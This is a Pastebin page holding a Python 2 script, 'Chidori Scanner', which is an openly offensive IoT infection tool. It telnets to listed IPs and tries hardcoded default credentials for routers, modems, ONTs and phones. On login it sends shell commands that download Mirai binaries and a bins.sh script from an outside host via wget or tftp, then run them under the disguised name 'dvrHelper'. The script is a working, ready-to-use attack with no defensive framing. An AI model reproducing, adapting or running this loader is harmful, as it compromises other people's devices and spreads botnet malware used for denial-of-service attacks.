API tools faq
paste
1337ings

[Python] Chidori Scanner

1337ings
Aug 14th, 2017
1,058
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.42 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. # Chidori Scanner
  3.  
  4. import threading
  5. import sys, os, re, time, socket
  6. from Queue import *
  7. from sys import stdout
  8.  
  9. if len(sys.argv) < 3:
  10. print "Usage: python "+sys.argv[0]+" <list> <threads>"
  11. sys.exit()
  12.  
  13. #SHIT THAT DONT NEED TO BE CHANGED
  14. ips = open(sys.argv[1], "r").readlines()
  15. threads = int(sys.argv[2])
  16. queue = Queue()
  17. queue_count = 0
  18.  
  19. #CONFIG#
  20. cmd_mips = "cd /tmp; rm -rf *; wget http://1.1.1.1/bins/mirai.mips || tftp -r mirai.mips -g 1.1.1.1 || tftp 1.1.1.1 -g mirai.mips; cat mirai.mips > dvrHelper; chmod +x dvrHelper; ./dvrHelper; rm -rf dvrHelper"
  21. cmd_mipsel = "cd /tmp; rm -rf *; wget http://1.1.1.1/bins/mirai.mpsl || tftp -r mirai.mpsl -g 1.1.1.1 || tftp 1.1.1.1 -g mirai.mpsl; cat mirai.mpsl > dvrHelper; chmod +x dvrHelper; ./dvrHelper; rm -rf dvrHelper"
  22. cmd_arm = "cd /tmp; rm -rf *; wget http://1.1.1.1/bins/mirai.arm7; cat mirai.arm7 > dvrHelper; chmod +x dvrHelper; ./dvrHelper; rm -rf dvrHelper"
  23. bin_sh = "http://1.1.1.1/bins.sh"
  24.  
  25. #ADDING IPS TO QUEUE#
  26. for ip in ips:
  27. queue_count += 1
  28. stdout.write("\r[%d] Added to queue" % queue_count)
  29. stdout.flush()
  30. queue.put(ip)
  31. print "\n"
  32.  
  33. #USER/PASS INFO
  34. combo = ["support:support", "admin:admin", "supervisor:zyad1234", "user:user"] #dont change
  35. usernames = ["root", "admin", "root", "admin"]
  36. passwords = ["oelinux123", "admin", "admin", "skbiptv"]
  37.  
  38. #HACKIFICATION ACTION#
  39. class router(threading.Thread):
  40. def __init__ (self, ip):
  41. threading.Thread.__init__(self)
  42. self.ip = str(ip).rstrip('\n')
  43. def run(self):
  44. end = 0
  45. while (end == 0):
  46. try:
  47. try:
  48. tn = socket.socket()
  49. tn.settimeout(8)
  50. tn.connect((self.ip,23))
  51. except Exception:
  52. end = 1
  53. tn.close()
  54. username = ""
  55. password = ""
  56. for passwd in combo:
  57. if ":n/a" in passwd:
  58. password=""
  59. else:
  60. password=passwd.split(":")[1]
  61. if "n/a:" in passwd:
  62. username=""
  63. else:
  64. username=passwd.split(":")[0]
  65. try:
  66. hoho = ''
  67. hoho += readUntil(tn, ":")
  68. if "BCM" in hoho:
  69. tn.send(username + "\n")
  70. time.sleep(0.09)
  71. elif "6511" in hoho:
  72. tn.send(username + "\n")
  73. time.sleep(0.09)
  74. elif "tangox" in hoho:
  75. tn.send("default" + "\n")
  76. time.sleep(0.09)
  77. elif "VMG" in hoho:
  78. password = "1234567890"
  79. tn.send("adminpldt" + "\n")
  80. time.sleep(0.1)
  81. elif "mdm9625" in hoho:
  82. nonr00t = 1
  83. username = usernames[1]
  84. password = passwords[1]
  85. tn.send(username + "\n")
  86. time.sleep(0.1)
  87. elif "9615-cdp" in hoho:
  88. r00t = 1
  89. username = usernames[0]
  90. password = passwords[0]
  91. tn.send(username + "\n")
  92. time.sleep(0.1)
  93. elif "Login as:" in hoho:
  94. ONT = 1
  95. username = usernames[2]
  96. password = passwords[2]
  97. tn.send(username + "\n")
  98. time.sleep(0.1)
  99. elif "(none)" in hoho:
  100. skbiptv = 1
  101. username = usernames[3]
  102. password = passwords[3]
  103. tn.send(username + "\n")
  104. time.sleep(0.1)
  105. else:
  106. tn.send(username + "\n")
  107. time.sleep(0.1)
  108. except Exception:
  109. end = 1
  110. tn.close()
  111. try:
  112. hoho = ''
  113. hoho += readUntil(tn, "assword:")
  114. if "assword" in hoho:
  115. tn.send(password + "\n")
  116. time.sleep(0.8)
  117. else:
  118. pass
  119. except Exception:
  120. end = 1
  121. tn.close()
  122. try:
  123. prompt = ''
  124. prompt += tn.recv(40960)
  125. if ">" in prompt:
  126. tn.send("cat | sh" + "\n")
  127. time.sleep(0.1)
  128. tn.send("sh" + "\n")
  129. time.sleep(0.1)
  130. tn.send(cmd_mips + "\n")
  131. print "\033[32m[%s] xDSL Command Sent!\033[37m"%(self.ip)
  132. time.sleep(10)
  133. tn.close()
  134. end = 1
  135. elif "default@" in prompt:
  136. tn.send(cmd_mipsel + "\n")
  137. print "\033[36m[%s] TangoX Command Sent!\033[37m"%(self.ip)
  138. time.sleep(10)
  139. tn.close()
  140. end = 1
  141. elif "Number:" in prompt:
  142. tn.send("24" + "\n")
  143. time.sleep(0.5)
  144. tn.send("8" + "\n")
  145. time.sleep(0.5)
  146. tn.send(cmd_mips + "\n")
  147. print "\033[35m[%s] VMG Command Sent!\033[37m"%(self.ip)
  148. time.sleep(10)
  149. tn.close()
  150. end = 1
  151. elif r00t:
  152. tn.send(cmd_arm + "\n")
  153. print "\033[33m[%s] Phone Command Sent!\033[37m"%(self.ip)
  154. time.sleep(10)
  155. tn.close()
  156. end = 1
  157. elif nonr00t:
  158. tn.send("su" + "\n")
  159. readUntil(tn, "Password:")
  160. tn.send(passwords[0] + "\n")
  161. time.sleep(0.5)
  162. tn.send(cmd_arm + "\n")
  163. print "\033[33m[%s] Phone Command Sent!\033[37m"%(self.ip)
  164. time.sleep(10)
  165. tn.close()
  166. end = 1
  167. elif ONT:
  168. tn.send("enable" + "\n")
  169. time.sleep(0.2)
  170. tn.send("system" + "\n")
  171. time.sleep(0.2)
  172. tn.send("shell" + "\n")
  173. time.sleep(0.2)
  174. command = "cd /tmp; wget "+bin_sh+"; sh bins.sh; rm -rf bins.sh"
  175. tn.send(command + "\n")
  176. print "\033[34m[%s] ONT Command Sent!\033[37m"%(self.ip)
  177. time.sleep(10)
  178. tn.close()
  179. end = 1
  180. elif skbiptv:
  181. tn.send(cmd_mips + "\n")
  182. print "\033[34m[%s] SKBIPTV Command Sent!\033[37m"%(self.ip)
  183. time.sleep(10)
  184. tn.close()
  185. end = 1
  186. else:
  187. if "#" in prompt or "$" in prompt:
  188. tn.send("sh" + "\n")
  189. time.sleep(0.2)
  190. tn.send("shell" + "\n")
  191. time.sleep(0.2)
  192. tn.send("system shell" + "\n")
  193. time.sleep(0.2)
  194. command = "cd /tmp; wget "+bin_sh+"; sh bins.sh; rm -rf bins.sh"
  195. tn.send(command + "\n")
  196. print "\033[37m[%s] Command Sent!\033[37m"%(self.ip)
  197. time.sleep(20)
  198. tn.close()
  199. end = 1
  200. else:
  201. pass
  202. except Exception:
  203. end = 1
  204. tn.close()
  205. except:
  206. pass
  207.  
  208. #SOCKET READ UNTIL#
  209. def readUntil(tn, string, timeout=10):
  210. buf = ''
  211. start_time = time.time()
  212. while time.time() - start_time < timeout:
  213. buf += tn.recv(2048)
  214. time.sleep(0.01)
  215. if string in buf: return buf
  216. raise Exception('TIMEOUT!')
  217.  
  218. #WORKER THREAD#
  219. def worker():
  220. try:
  221. while True:
  222. try:
  223. iP = queue.get()
  224. thrd = router(iP)
  225. thrd.start()
  226. queue.task_done()
  227. time.sleep(0.2)
  228. except:
  229. pass
  230. except:
  231. pass
  232.  
  233. #STARTING WORKER THREADS#
  234. for l in xrange(threads):
  235. try:
  236. t = threading.Thread(target=worker)
  237. t.start()
  238. time.sleep(0.009)
  239. except:
  240. pass
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!